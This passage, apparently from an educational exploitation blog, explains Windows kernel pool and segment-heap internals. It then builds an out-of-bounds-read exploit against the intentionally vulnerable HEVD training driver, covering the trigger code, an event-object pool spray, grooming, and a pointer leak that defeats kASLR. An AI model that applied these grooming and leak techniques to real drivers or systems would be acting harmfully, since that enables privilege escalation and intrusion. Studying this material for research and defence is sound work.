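    NonPagedPoolSessionNx         = 544
    // ...
} POOL_TYPE;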

Although there are many different types of allocations, notice how all of them, for the most part, are prefaced with NonPagedPool or PagedPool. This is because, on Windows, pool allocations come from these two pools (or they come from the session pool, which is beyond the scope of this post and is leveraged by win32k.sys). In user mode, developers have the default process heap to allocate chunks from, or they can create their own private heaps as well. The Windows pool works a little differently, as the system predefines two pools (for our purposes) of memory for servicing requests in the kernel. Recall also that allocations in the paged pool can be paged out of memory, while allocations in the non-paged pool are always resident in memory. This basically means memory in the NonPagedPool/NonPagedPoolNx is always accessible. This caveat also means that the non-paged pool is a more “expensive” resource and should be used accordingly.

As far as pool chunks go, the terminology is pretty much in line with heap chunks, which I talked about in a previous blog on browser exploitation. Each pool chunk is prepended with a 0x10-byte _POOL_HEADER structure on 64-bit systems, which can be examined using WinDbg.

This structure contains metadata about the in-scope chunk. One interesting thing to note is that when a pool chunk is freed and its _POOL_HEADER isn’t a valid header, a system crash will occur.

The ProcessBilled member of this structure is a pointer to the _EPROCESS object which made the allocation, but only if PoolQuota was set in the PoolType parameter of ExAllocatePoolWithTag. Notice that at an offset of 0x8 in this structure there is a union member, as it is clear that two members reside at offset 0x8.
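An approximation of the 64-bit layout, reconstructed from public symbols (this is a sketch, not the authoritative definition; the real structure uses an unnamed union):

#include <cstdint>

// Approximate 64-bit nt!_POOL_HEADER layout (0x10 bytes total).
struct POOL_HEADER {
    uint32_t PreviousSize : 8;
    uint32_t PoolIndex    : 8;
    uint32_t BlockSize    : 8;
    uint32_t PoolType     : 8;
    uint32_t PoolTag;                 // the tag passed to ExAllocatePoolWithTag
    union Overlay {                   // +0x8: two views of the same eight bytes
        void *ProcessBilled;          // _EPROCESS pointer, only meaningful when PoolQuota is used
        struct Trace {
            uint16_t AllocatorBackTraceIndex;
            uint16_t PoolTagHash;
        } Debug;
    } u;
};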

As a test, let’s set a breakpoint on nt!ExAllocatePoolWithTag. Since the Windows kernel will constantly call this function, we don’t need to create a driver that calls this function, as the system will already do this.

After setting a breakpoint, we can execute the function and examine the return value, which is the pool chunk that is allocated.

Notice how the ProcessBilled member isn’t a valid pointer to an _EPROCESS object. This is because this is a vanilla call to nt!ExAllocatePoolWithTag, without any scheduling quota madness going on, meaning the ProcessBilled member isn’t set. Since the AllocatorBackTraceIndex and PoolTagHash are obviously stored in a union, based on the fact that both the ProcessBilled and AllocatorBackTraceIndex members are at the same offset in memory, the two members AllocatorBackTraceIndex and PoolTagHash are actually “carried over” into the ProcessBilled member. This won’t affect anything, since the ProcessBilled member isn’t accounted for due to the fact that PoolQuota wasn’t set in the PoolType parameter, and this is how WinDbg interprets the memory layout. If the PoolQuota was set, the EPROCESS pointer is actually XOR’d with a random “cookie”, meaning that if you wanted to reconstruct this header you would need to first leak the cookie. This information will be useful later on in the pool overflow vulnerability in part 2, which will not leverage PoolQuota.

Let's now talk about the segment heap. The segment heap, which was already present in user mode, was implemented in the Windows kernel with the 19H1 build of Windows 10. The "gist" of the segment heap is this: when a component in the kernel requests some dynamic memory, via one of the previously mentioned API calls, there are now four backend allocators that can service the request. They are:

  1. Low Fragmentation Heap (kLFH)
  2. Variable Size (VS)
  3. Segment Alloc
  4. Large Alloc

Each pool is now managed by a _SEGMENT_HEAP structure, as seen below, which provides references to various “segments” in use for the pool and contains metadata for the pool.

The vulnerabilities mentioned in this blog post revolve around the kLFH. For more detail on the internals of each allocator, I highly recommend reading this paper and viewing Yarden Shafir's upcoming BlackHat talk on pool internals in the age of the segment heap!

For the purposes of this exploit and as a general note, let’s talk about how the _POOL_HEADER structure is used.

We talked about the _POOL_HEADER structure earlier - but let's dig a bit deeper into that concept to see if/when it is even used when the segment heap is enabled.

Any size allocation that cannot fit into a Variable Size segment allocation will pretty much end up in the kLFH. What is interesting here is that the _POOL_HEADER structure is no longer used for chunks within the VS segment. Chunks allocated using the VS segment are instead prefaced with a header structure called _HEAP_VS_CHUNK_HEADER, which was pointed out to me by my co-worker Yarden Shafir. This structure can be seen in WinDbg.

The interesting fact about pool headers with the segment heap is that the kLFH, which will be the target for this post, still uses _POOL_HEADER structures to preface pool chunks.

Chunks allocated by the kLFH and VS segments are shown below.

Why does this matter? For the purposes of exploitation in part 2, there will be a pool overflow at some point during exploitation. Since we know that pool chunks are prefaced with a header, and because we know that an invalid header will cause a crash, we need to be mindful of this. Using our overflow, we will need to make sure that a valid header is present during exploitation. Since our exploit will be targeting the kLFH, which still uses the standard _POOL_HEADER structure with no encoding, this will prove to be rather trivial later. _HEAP_VS_CHUNK_HEADER, however, performs additional encoding on its members.

The “last piece of this puzzle” is to understand how we can force the system to allocate pool chunks via the kLFH segment. The kLFH services requests that range in size from 1 byte to 16,368 bytes. The kLFH segment is also managed by the _HEAP_LFH_CONTEXT structure, which can be dumped in WinDbg.

The kLFH has “buckets” for each allocation size. The tl;dr here is if you want to trigger the kLFH you need to make 16 consecutive requests to the same size bucket. There are 129 buckets, and each bucket has a “granularity”. Let’s look at a chart to see the determining factors in where an allocation resides in the kLFH, based on size, which was taken from the previously mentioned paper from Corentin and Paul.

This means that the smallest allocations are serviced at a 16-byte granularity (bucket 1 for allocations of 1-16 bytes, bucket 2 for 17-32 bytes, and so on), with the granularity increasing as the allocation size grows, up to a 512-byte granularity for the largest kLFH buckets. Anything larger is either serviced by the VS segment or by other components of the segment heap.

Let's say we perform a pool spray of objects which are 0x40 bytes and we do this 100 times. We can expect that most of these allocations will end up in the kLFH, due to the heuristic of 16 consecutive allocations and because the size matches one of the buckets provided by the kLFH. This is very useful for exploitation, as it means there is a good chance we can groom the pool relatively well. Grooming refers to getting a lot of pool chunks which we control lined up adjacently, in order to make exploitation reliable. For example, if we can groom the pool with objects we control, one after the other, we can ensure that a pool overflow will overflow into data which we control, leading to exploitation. We will touch a lot more on this in the future.

The kLFH also uses these predetermined buckets to manage chunks. This removes something known as coalescing, which is when the pool manager combines multiple free chunks into a bigger chunk for performance. Now, with the kLFH, because of this architecture, we know that if we free an object in the kLFH, the freed slot will remain free until it is used again by an allocation of that specific size. For example, if we are working in a bucket which can hold anything from 1 byte to 1008 bytes, and we allocate two objects of size 1008 bytes and then free these objects, the pool manager will not combine these slots, because that would result in a free chunk of 2016 bytes, which doesn't fit into the bucket, which can only hold 1-1008 bytes. This means the kLFH will keep these slots free until the next allocation of this size comes in and uses one of them. This will also be useful later on.

However, what are the drawbacks to the kLFH? Since the kLFH uses predetermined sizes, we need to be very lucky to have a driver allocate objects which are the same size as a vulnerable object which can be overflowed or manipulated. Let's say we can perform a pool overflow into an adjacent chunk as such, in this expertly crafted Microsoft Paint diagram.

If this overflow is happening in a kLFH bucket on the NonPagedPoolNx, for instance, we know that an overflow from one chunk will overflow into another chunk of the EXACT same size. This is because of the kLFH buckets, which predetermine which sizes are allowed in a bucket and therefore what sizes the adjacent pool chunks are. So, in this situation (and as we will showcase in this blog) the chunk adjacent to the vulnerable chunk must be the same size as the vulnerable chunk and must be allocated on the same pool type, which in this case is the NonPagedPoolNx. This severely limits the scope of objects we can use for grooming, as we need to find objects, whether they are typedef'd objects from a driver itself or native Windows objects that can be allocated from user mode, that are the same size as the object we are overflowing. Not only that, but the object must also contain some sort of interesting member, like a function pointer, to make the overflow worthwhile. This means we now need to find objects that are capped at a certain size, allocated in the same pool, and contain something interesting.

The last thing to say before we get into the out-of-bounds read is that some of the elements of this exploit are slightly contrived to outline successful exploitation. I will say, however, that I have seen drivers which allocate pool memory, let unauthenticated clients specify the size of the allocation, and then return the contents to user mode - so this isn't to say that there are no poorly written drivers out there. I do want to call out, however, that this post is more about the underlying concepts of pool exploitation in the age of the segment heap than about some "new" or "novel" way to bypass the stipulations of the segment heap. Now, let's get into exploitation.

From Out-Of-Bounds-Read to kASLR bypass - Low-Integrity Exploitation

Let’s take a look at the file in HEVD called MemoryDisclosureNonPagedPoolNx.c. We will start with the code and eventually move our way into dynamic analysis with WinDbg.
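
A paraphrased and slightly trimmed version of the function we will be looking at, TriggerMemoryDisclosureNonPagedPoolNx, is shown below. This is not the verbatim HEVD source (error handling, logging, and SEH have been stripped out), but it captures the behavior discussed in this section:

// Paraphrase of HEVD's TriggerMemoryDisclosureNonPagedPoolNx (simplified)
NTSTATUS TriggerMemoryDisclosureNonPagedPoolNx(PVOID UserOutputBuffer, SIZE_T Size)
{
    NTSTATUS Status = STATUS_SUCCESS;
    PVOID KernelBuffer = NULL;

    // 0x70-byte allocation on the NonPagedPoolNx, tagged 'kcaH'
    KernelBuffer = ExAllocatePoolWithTag(NonPagedPoolNx, POOL_BUFFER_SIZE, POOL_TAG);

    if (KernelBuffer == NULL)
    {
        return STATUS_INSUFFICIENT_RESOURCES;
    }

    // Fill the chunk with 0x70 0x41 ('A') characters
    RtlFillMemory(KernelBuffer, POOL_BUFFER_SIZE, 0x41);

    // Ensure the output buffer is a writable user-mode buffer
    ProbeForWrite(UserOutputBuffer, POOL_BUFFER_SIZE, (ULONG)__alignof(UCHAR));

#ifdef SECURE
    // Secure: only copy as many bytes as were allocated
    RtlCopyMemory(UserOutputBuffer, KernelBuffer, POOL_BUFFER_SIZE);
#else
    // Vulnerable: the caller-controlled size drives the copy
    RtlCopyMemory(UserOutputBuffer, KernelBuffer, Size);
#endif

    ExFreePoolWithTag(KernelBuffer, POOL_TAG);
    return Status;
}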

The above snippet of code is a function which is defined as TriggerMemoryDisclosureNonPagedPoolNx. This function has a return type of NTSTATUS. This code invokes ExAllocatePoolWithTag and creates a pool chunk on the NonPagedPoolNx kernel pool of size POOL_BUFFER_SIZE and with the pool tag POOL_TAG. Tracing the value of POOL_BUFFER_SIZE in MemoryDisclosureNonPagedPoolNx.h, which is included in the MemoryDisclosureNonPagedPoolNx.c file, we can see that the pool chunk allocated here is 0x70 bytes in size. POOL_TAG is also included in Common.h as kcaH, which is more humanly readable as Hack.

After the pool chunk is allocated in the NonPagedPoolNx it is filled with 0x41 characters, 0x70 of them to be precise, as seen in the call to RtlFillMemory. There is no vulnerability here yet, as nothing so far is influenced by a client invoking an IOCTL which would reach this routine. Let’s continue down the code to see what happens.

After initializing the buffer with 0x70 0x41 characters, the first defined parameter of TriggerMemoryDisclosureNonPagedPoolNx, which is PVOID UserOutputBuffer, is passed to a ProbeForWrite routine to ensure this buffer resides in user mode. Where does UserOutputBuffer come from (besides its obvious name)? Let's view where the function TriggerMemoryDisclosureNonPagedPoolNx is actually invoked from, which is at the end of MemoryDisclosureNonPagedPoolNx.c.

We can see that the first argument passed to TriggerMemoryDisclosureNonPagedPoolNx, the function we have been analyzing thus far, is a variable called UserOutputBuffer. This variable comes from the I/O Request Packet (IRP) which was passed to the driver and created by a client invoking DeviceIoControl to interact with the driver. More specifically, this comes from the IO_STACK_LOCATION structure, which always accompanies an IRP. This structure contains many members and data used by the IRP to pass information to the driver. In this case, the associated IO_STACK_LOCATION structure contains most of the parameters used by the client in the call to DeviceIoControl. The IRP structure itself contains the UserBuffer parameter, which is actually the output buffer supplied by a client using DeviceIoControl. This means that this buffer will be bubbled back up to user mode for any client which sends an IOCTL code that reaches this routine. I know this seems like a mouthful right now, but I will give the "tl;dr" here in a second.
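
Paraphrasing the handler rather than quoting it verbatim, the flow looks roughly like this:

// Rough paraphrase of the IOCTL handler in MemoryDisclosureNonPagedPoolNx.c
NTSTATUS MemoryDisclosureNonPagedPoolNxIoctlHandler(PIRP Irp, PIO_STACK_LOCATION IrpSp)
{
    NTSTATUS Status = STATUS_UNSUCCESSFUL;

    // The output buffer supplied to DeviceIoControl by the client
    PVOID UserOutputBuffer = Irp->UserBuffer;

    // The nOutBufferSize value supplied to DeviceIoControl by the client
    SIZE_T Size = IrpSp->Parameters.DeviceIoControl.OutputBufferLength;

    if (UserOutputBuffer != NULL)
    {
        Status = TriggerMemoryDisclosureNonPagedPoolNx(UserOutputBuffer, Size);
    }

    return Status;
}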

Essentially what happens here is a user-mode client can specify a size and a buffer, which will get used in the call to TriggerMemoryDisclosureNonPagedPoolNx. Let's then take a quick look back at the image from two images ago, which is displayed again below for convenience.

Skipping over the #ifdef SECURE directive, which is obviously what a "secure" driver should use, we can see that if the allocation of the previously mentioned pool chunk (of size POOL_BUFFER_SIZE, or 0x70 bytes) is successful, the contents of the pool chunk are written to the UserOutputBuffer variable, which is returned to the client invoking DeviceIoControl - and the amount of data copied into this buffer is decided by the client via the nOutBufferSize parameter.

What is the issue here? ExAllocatePoolWithTag allocates a fixed 0x70-byte pool chunk, but the call to RtlCopyMemory allows the client to decide how many bytes are written to the UserOutputBuffer parameter. This isn't an issue of a buffer overflow of UserOutputBuffer itself, as we fully control this buffer via our call to DeviceIoControl and can make it large enough to avoid it being overflowed. The issue lies in the second and third parameters of the copy.

The pool chunk allocated in this case is 0x70 bytes. If we look at the #ifdef SECURE directive, we can see that the KernelBuffer created by the call to ExAllocatePoolWithTag is copied to the UserOutputBuffer parameter and NOTHING MORE, as defined by the POOL_BUFFER_SIZE parameter. Since the allocation created is only POOL_BUFFER_SIZE, we should only allow the copy operation to copy this many bytes.

If a size greater than 0x70, or POOL_BUFFER_SIZE, is provided to the RtlCopyMemory function, the data in the adjacent pool chunk right after the KernelBuffer pool chunk would also be copied to the UserOutputBuffer. The below diagram outlines this.

If the size of the copy operation is greater than the allocation size of 0x70 bytes, the bytes after the first 0x70 are taken from the adjacent chunk and are also bubbled back up to user mode. In the case of supplying a value of 0x100 in the size parameter, which is controllable by the caller, the 0x70 bytes from the allocation would be copied back into user mode and the next 0x30 bytes from the adjacent chunk would also be copied back into user mode. Let's verify this in WinDbg.

For brevity's sake, the routine to reach this code is via the IOCTL 0x0022204f. Here is the code we are going to send to the driver.
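
A minimal sketch of that trigger is shown below (the full, final POC appears at the end of this post). The output buffer starts out at 0x70 bytes to match the allocation size; bumping it to 0x100 later is what triggers the out-of-bounds read:

#include <windows.h>
#include <stdio.h>

int main(void)
{
    // Open a handle to HEVD
    HANDLE driverHandle = CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        0x0,
        NULL,
        OPEN_EXISTING,
        0x0,
        NULL
    );

    if (driverHandle == INVALID_HANDLE_VALUE)
    {
        printf("[-] Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());
        return -1;
    }

    // Buffer the driver will copy the pool chunk into (0x70 bytes)
    unsigned char outputBuffer[0x70] = { 0 };
    DWORD bytesReturned = 0;

    // IOCTL that reaches TriggerMemoryDisclosureNonPagedPoolNx
    DeviceIoControl(
        driverHandle,
        0x0022204f,
        NULL,
        0,
        &outputBuffer,
        sizeof(outputBuffer),   // the size passed to RtlCopyMemory in the driver
        &bytesReturned,
        NULL
    );

    CloseHandle(driverHandle);
    return 0;
}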

We can start by setting a breakpoint on HEVD!TriggerMemoryDisclosureNonPagedPoolNx.

Per the __fastcall calling convention, the two arguments passed to TriggerMemoryDisclosureNonPagedPoolNx will be in RCX (the UserOutputBuffer parameter) and RDX (the size specified by us). Dumping the RCX register, we can see the 0x70-byte buffer that will receive the allocation's contents.

We can then set a breakpoint on the call to nt!ExAllocatePoolWithTag.

After executing the call, we can then inspect the return value in RAX.

Interesting! We know the IOCTL code in this case allocated a pool chunk of 0x70 bytes, but every allocation in the pool our chunk resides in, which is denoted with the asterisk above, is actually 0x80 bytes. Remember - each chunk in the kLFH is prefaced with a _POOL_HEADER structure. We can validate this below by confirming that the PoolTag member of the _POOL_HEADER, at its expected offset, contains our tag.

The total size of this pool chunk with the header is 0x80 bytes. Recall earlier when we spoke about the kLFH that this size allocation would fall within the kLFH! We know the next thing the code will do in this situation is to copy 0x41 values into the newly allocated chunk. Let’s set a breakpoint on HEVD!memset, which is actually just what the RtlFillMemory macro defaults to.

Inspecting the return value, we can see the buffer was initialized to 0x41 values.

The next action, as we can recall, is the copying of the data from the newly allocated chunk to user mode. Setting a breakpoint on the HEVD!memcpy call, which is the actual function the macro RtlCopyMemory will call, we can inspect RCX, RDX, and R8, which will be the destination, source, and size respectively.

Notice the value in RCX, which is a user-mode address (and the address of our output buffer supplied by DeviceIoControl), is different from the value shown originally. This is simply because I had to re-run the POC trigger between the original screenshot and the current one. Other than that, nothing else has changed.

After stepping through the memcpy call we can clearly see the contents of the pool chunk are returned to user mode.

Perfect! This is expected behavior by the driver. However, let’s try increasing the size of the output buffer and see what happens, per our hypothesis on this vulnerability. This time, let’s set the output buffer to 0x100.

This time, let’s just inspect the memcpy call.

Take note of the above highlighted content after the 0x41 values.

Let’s now check out the pool chunks in this pool and view the adjacent chunk to our Hack pool chunk.

Last time we performed the IOCTL invocation, only values of 0x41 were bubbled back up to user mode. However, recall that this time we specified a value of 0x100. This means we should also be returning the next 0x30 bytes after the Hack pool chunk back to user mode. Taking a look at the previous image, the chunk directly after the Hack chunk is 0xffffe48f4254fb00, which begins with a value of 6c54655302081b00 and so on - this is the _POOL_HEADER for the next chunk, as seen below.

These 0x10 bytes, plus the next 0x20 bytes should be returned to us in user mode, as we specified we want to go beyond the bounds of the pool chunk, hence an “out-of-bounds read”. Executing the POC, we can see this is the case!

Awesome! We can see, minus some of the endianness madness that is occurring, we have successfully read memory from the adjacent chunk! This is very useful, but remember what our goal is - we want to bypass kASLR. This means we need to leak some sort of pointer, either from the driver or from ntoskrnl.exe itself. How can we achieve this if all we can leak is the next adjacent pool chunk? To do this, we need to perform some additional steps to ensure that, while we are in the kLFH segment, the adjacent chunk(s) always contain some sort of useful pointer that can be leaked by us. This process is called "pool grooming".

Taking The Dog To The Groomer

Up until this point we know we can read data from adjacent pool chunks, but as of now there isn’t really anything interesting next to these chunks. So, how do we combat this? Let’s talk about a few assumptions here:

  1. We know that if we can choose an object to read from, this object will need to be 0x70 bytes in size (0x80 when you include the _POOL_HEADER)
  2. This object needs to be allocated on the NonPagedPoolNx directly after the chunk allocated by HEVD in MemoryDisclosureNonPagedPoolNx
  3. This object needs to contain some sort of useful pointer

How can we go about doing this? Let’s sort of visualize what the kLFH does in order to service requests of 0x70 bytes (technically 0x80 with the header). Please note that the following diagram is for visual purposes only.

As we can see, there are several free slots within this specific page in the pool. If we allocated an object of size 0x80 (technically 0x70, where the _POOL_HEADER is dynamically created) we have no way to know, or to force, the allocation to occur at a predictable location. That said, the kLFH may not even be enabled at all, due to the heuristic requirement of 16 consecutive allocations to the same size. Where does this leave us? Well, what we can do is first make sure the kLFH is enabled, and then "fill" all of the current "holes", or freed allocations, with a set of objects. This will force the memory manager to allocate a new page entirely to service new allocations. This process of the memory manager allocating a new page for future allocations within the kLFH bucket is ideal, as it gives us a "clean slate" to start from, without random free chunks that could be serviced at random intervals. We want to do this before we invoke the IOCTL which triggers the TriggerMemoryDisclosureNonPagedPoolNx function in MemoryDisclosureNonPagedPoolNx.c. This is because we want the allocation for the vulnerable pool chunk, which will be the same size as the objects we use for "spraying" the pool to fill the holes, to end up in the same page as the sprayed objects we have control over. This will allow us to groom the pool and make sure that we can read from a chunk that contains some useful information.

Let’s recall the previous image which shows where the vulnerable pool chunk ends up currently.

Organically, without any grooming/spraying, we can see that there are several other types of objects in this page. Notably, we can see several Even tags. This tag is used for objects created with a call to CreateEvent, a Windows API which can be invoked from user mode. The prototype can be seen below.
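
As documented in the Windows SDK:

HANDLE CreateEventA(
    LPSECURITY_ATTRIBUTES lpEventAttributes,
    BOOL                  bManualReset,
    BOOL                  bInitialState,
    LPCSTR                lpName
);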

This function returns a handle to the object, which is backed by a pool chunk in kernel mode. This is reminiscent of when we obtain a handle to the driver for the call to CreateFile. The handle is an intermediary object that we can interact with from user mode, which has a kernel-mode component.

Let’s update the code to leverage CreateEventA to spray an arbitrary amount of objects, 5000.
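
The spray itself is just a loop of CreateEventA calls whose handles we hold on to; the full routine appears in the final POC at the end of this post, but the core of it looks like this:

// Spray event objects to fill the existing free slots of this size
HANDLE eventObjects[5000];

for (int i = 0; i < 5000; i++)
{
    eventObjects[i] = CreateEventA(NULL, FALSE, FALSE, NULL);
}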

After executing the newly updated code and setting a breakpoint on the copy operation involving the vulnerable pool chunk, take a look at the state of the page which contains that chunk.

This isn't in an ideal state yet, but notice how we have influenced the page's layout. We can see now that there are many free objects and a few event objects. This behavior suggests we have been given a new page for our vulnerable chunk to land in, as our vulnerable chunk is preceded by several event objects, with our vulnerable chunk allocated directly after them. We can also perform additional analysis by inspecting the previous page (recall that for our purposes, on this 64-bit Windows 10 install, a page is 0x1000 bytes, or 4KB).

It seems as though all of the previous chunks that were free have been filled with event objects!

Notice, though, that the pool layout is not perfect. This is due to other components of the kernel also leveraging the kLFH bucket for 0x70 byte allocations (0x80 with the _POOL_HEADER).

Now that we know we can influence the behavior of the pool by spraying, the goal is to fill the entire new page with event objects and then free every other event object we control in that page. Right after freeing every other object, we can then create more objects of the same size as the event object(s) we just freed. By doing this, the kLFH, due to optimization, will place the new objects we allocate into the free slots. This is because the current page is the only page that should have free slots available in the NonPagedPoolNx for allocations being serviced by the kLFH for size 0x70 (0x80 including the header).

We would like the pool layout to look like this (for the time being):

EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT 

So what kind of object would we like to place in the "holes" we want to poke? This object is the one we want to leak back to user mode, so it should contain either valuable kernel information or a function pointer. The hardest/most tedious part of pool corruption is finding something that is not only the needed size, but that also contains valuable information. This especially holds true if you cannot use a generic Windows object and need to use a structure that is specific to a driver.

In any event, this next part is a bit "simplified". It will take a bit of reverse engineering/debugging of calls that allocate pool chunks for objects to find a suitable candidate. The way to approach this, at least in my opinion, would be as follows:

  1. Identify calls to ExAllocatePoolWithTag, or similar APIs
  2. Narrow this list down by finding calls to the aforementioned API(s) that are allocated within the pool you are able to corrupt (e.g. if I have a vulnerability on the NonPagedPoolNx, find an allocation on the NonPagedPoolNx)
  3. Narrow this list further by finding calls that meet the above criteria and allocate a pool chunk of the size you need
  4. If you have made it this far, narrow this down further by finding an object with all of the above attributes and with an interesting member, such as a function pointer

However, our job is slightly easier because we can use the source code, so let's find a suitable object within HEVD. In HEVD there is an object which contains a function pointer, called USE_AFTER_FREE_NON_PAGED_POOL_NX. It is constructed as such, within UseAfterFreeNonPagedPoolNx.h.
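
An approximation of that definition is shown below. Note that the Buffer length here is an assumption on my part, sized so the structure lines up with the 0x70-byte allocation discussed shortly; consult UseAfterFreeNonPagedPoolNx.h for the exact declaration:

typedef struct _USE_AFTER_FREE_NON_PAGED_POOL_NX
{
    FunctionPointer Callback;   // later set to UaFObjectCallbackNonPagedPoolNx in HEVD.sys
    CHAR Buffer[0x68];          // illustrative length, filled with 0x41 characters
} USE_AFTER_FREE_NON_PAGED_POOL_NX, *PUSE_AFTER_FREE_NON_PAGED_POOL_NX;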

This structure is used in a function call within UseAfterFreeNonPagedPoolNx.c and the Buffer member is initialized with 0x41 characters.

The Callback member, which is of type FunctionPointer and is defined in Common.h as typedef void (*FunctionPointer)(void);, is set to the memory address of UaFObjectCallbackNonPagedPoolNx, which is a function located in UseAfterFreeNonPagedPoolNx.c, shown two images ago! This means a member of this structure will contain a function pointer within HEVD, a kernel-mode address. We know by the name that this object will be allocated on the NonPagedPoolNx, but you could still validate this by performing static analysis on the call to ExAllocatePoolWithTag to see what value is specified for POOL_TYPE.

This seems like a perfect candidate! The goal will be to leak this structure back to user mode with the out-of-bounds read vulnerability! The only factor that remains is size - we need to make sure this object is also 0x70 bytes in size, so it lands within the same pool page we control.

Let’s test this in WinDbg. In order to reach the AllocateUaFObjectNonPagedPoolNx function we need to interact with the IOCTL handler for this particular routine, which is defined in NonPagedPoolNx.c.

The IOCTL code needed to reach this routine, for brevity, is 0x00222053. Let’s set a breakpoint on HEVD!AllocateUaFObjectNonPagedPoolNx in WinDbg, issue a DeviceIoControl call to this IOCTL without any buffers, and see what size is being used in the call to ExAllocatePoolWithTag to allocate this object.

Perfect! Slightly contrived, but nonetheless true, the object being created here is also 0x70 bytes (without the _POOL_HEADER structure) - meaning this object should be allocated into the free slots within the page our event objects live in! Let's update our POC to perform the following (see the code sketch after this list):

  1. Free every other event object
  2. Replace every other event object (5000/2 = 2500) with a USE_AFTER_FREE_NON_PAGED_POOL_NX object
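
In code (condensed from the full POC at the end of this post), that boils down to the following:

// Poke holes: free every other event object
for (int i = 0; i < 5000; i += 2)
{
    CloseHandle(eventObjects[i]);
    eventObjects[i] = NULL;
}

// Refill the holes with USE_AFTER_FREE_NON_PAGED_POOL_NX objects by
// invoking the allocation IOCTL 2500 times
DWORD bytesReturned = 0;

for (int i = 0; i < 2500; i++)
{
    DeviceIoControl(driverHandle, 0x00222053, NULL, 0, NULL, 0, &bytesReturned, NULL);
}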

Using the breakpoint on the memcpy routine (RtlCopyMemory) from the original out-of-bounds read IOCTL path, we can inspect the pool chunk used as the source of the copy operation - the chunk whose contents will be bubbled back up to user mode - to confirm that our event objects are now adjacent to multiple USE_AFTER_FREE_NON_PAGED_POOL_NX objects.

We can see that the Hack-tagged chunks, which are USE_AFTER_FREE_NON_PAGED_POOL_NX chunks, are pretty much adjacent to the event objects! Even if not every object is perfectly adjacent to the previous event object, this is not a worry for us, because the vulnerability allows us to specify how much data from the adjacent chunks we would like to return to user mode. This means we could specify an arbitrary amount, such as 0x1000, and that is how many bytes would be returned from the adjacent chunks.

Since there are many chunks which are adjacent, this will still result in an information leak. The reason I say this is because the kLFH has a bit of "funkiness" going on. As I found out after talking with my colleague Yarden Shafir, this isn't necessarily due to any sort of kLFH "randomization" of where the free chunks will be or where the allocations will occur, but due to the complexity of the subsegment locations, caching, etc. Things can get complex quite quickly, and this is beyond the scope of this blog post.

The only time this becomes an issue, however, is when clients can read out-of-bounds but cannot specify how many bytes out-of-bounds they can read. This would result in exploits needing to run a few times in order to leak a valid kernel address, until the chunks become adjacent. However, someone who is better at pool grooming than myself could easily figure this out I am sure :).

Now that we can groom the pool decently enough, the next step is to replace the rest of the event objects with vulnerable objects from the out-of-bounds read vulnerability! The desired layout of the pool will be this:

VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX 

Why do we want this to be the desired layout? Each of the VULNERABLE_OBJECTS can read additional data from adjacent chunks. Since (theoretically) the next adjacent chunk should be USE_AFTER_FREE_NON_PAGED_POOL_NX, we should be returning this entire chunk to user mode. Since this structure contains a function pointer in HEVD, we can then bypass kASLR by leaking a pointer from HEVD! To do this, we will need to perform the following steps:

  1. Free the rest of the event objects
  2. Perform a number of calls to the IOCTL handler for allocating vulnerable chunks

For step two, we don't want to perform 2500 DeviceIoControl calls, as there is potential for one of the last memory addresses in the page to be set to one of our vulnerable objects. If we specify we want to read 0x1000 bytes, and if our vulnerable object is at the end of the last valid page for the pool, it will try reading from an address 0x1000 bytes away, which may reside in a page that is not currently committed to memory, causing a DoS by referencing invalid memory. To compensate for this, we only want to allocate 100 vulnerable objects, as one of them will almost surely be allocated in a block adjacent to a USE_AFTER_FREE_NON_PAGED_POOL_NX object.

To do this, let’s update the code as follows.
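
Condensed from the final POC, the relevant additions look like this:

// Free the rest of the event objects
for (int i = 1; i < 5000; i += 2)
{
    CloseHandle(eventObjects[i]);
    eventObjects[i] = NULL;
}

// Trigger the out-of-bounds read 100 times; each call copies
// sizeof(outputBuffer) bytes starting at the vulnerable chunk
unsigned long long outputBuffer[100] = { 0 };
DWORD bytesReturned = 0;

for (int i = 0; i < 100; i++)
{
    DeviceIoControl(driverHandle, 0x0022204f, NULL, 0,
                    &outputBuffer, sizeof(outputBuffer), &bytesReturned, NULL);
}

// Parse the leak for a sign-extended (kernel-mode) address
for (int i = 0; i < 100; i++)
{
    if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
    {
        printf("[+] Leaked pointer into HEVD.sys: 0x%llx\n", outputBuffer[i]);
        break;
    }
}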

After freeing the event objects and reading back data from adjacent chunks, a for loop is used to parse the output for anything that is sign-extended (a kernel-mode address). Since the output buffer is an array of unsigned long long values, the size of a 64-bit address, and since the address we want to leak is the first member of the adjacent chunk (right after the leaked _POOL_HEADER), it lands cleanly in a 64-bit array slot and is therefore easily parsed. Once we have leaked the address of the function pointer, we can calculate the distance from that function to the base of HEVD, subtract the distance, and obtain the base of HEVD!

Executing the final exploit, leveraging the same breakpoint on the final HEVD!memcpy call (remember, we are executing 100 calls to the final DeviceIoControl routine, which invokes the RtlCopyMemory routine, meaning we need to step through 99 times to hit the final copy back into user mode), we can see the layout of the pool.

The above image is a bit difficult to decipher, given that both the vulnerable chunks and the USE_AFTER_FREE_NON_PAGED_POOL_NX chunks have Hack tags. However, if we take the chunk adjacent to the current chunk (a vulnerable chunk we can read past, denoted by an asterisk) and parse it as a USE_AFTER_FREE_NON_PAGED_POOL_NX object, we can see clearly that this object is of the correct type and contains a function pointer within HEVD!

We can then subtract the distance from this function pointer to the base of HEVD and update our code accordingly. We can see the distance is 0x880cc, so adding this calculation to the code is trivial.

After performing the calculation, we can see we have bypassed kASLR, from low integrity, without any calls to EnumDeviceDrivers or similar APIs!

The final code can be seen below.

// HackSysExtreme Vulnerable Driver: Pool Overflow/Memory Disclosure
// Author: Connor McGarr(@33y0re)

// Vulnerability description: Arbitrary read primitive
// User-mode clients have the ability to control the size of an allocated pool chunk on the NonPagedPoolNx
// This pool chunk is 0x80 bytes (including the header)
// There is an object, a UafObject created by HEVD, that is 0x80 bytes in size (including the header) and contains a function pointer that is to be read -- this must be used due to the kLFH, which is only groomable for sizes in the same bucket
// CreateEventA can be used to allocate 0x80 byte objects, including the size of the header, which can also be used for grooming

#include <windows.h>
#include <stdio.h>

